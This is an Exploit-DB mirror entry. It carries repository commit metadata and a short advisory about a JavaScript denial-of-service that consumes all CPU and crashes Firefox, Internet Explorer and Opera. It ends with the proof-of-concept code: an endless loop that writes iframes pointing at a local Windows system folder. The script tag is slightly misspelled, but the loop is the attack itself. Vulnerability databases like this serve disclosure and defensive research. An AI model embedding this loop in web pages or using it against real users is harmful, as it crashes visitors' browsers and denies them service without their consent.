exploit-db-mirror/exploits/windows/dos/24395.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
504 B
Text

source: https://www.securityfocus.com/bid/10998/info
Web browsers from various vendors are reported prone to a JavaScript denial-of-service vulnerability.
The specified JavaScript code will consume 100% of the CPU resources of the affected computer, crashing the browser.
Mozilla Firefox, Microsoft Internet Explorer, and Opera are all reportedly affected by this vulnerability.
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>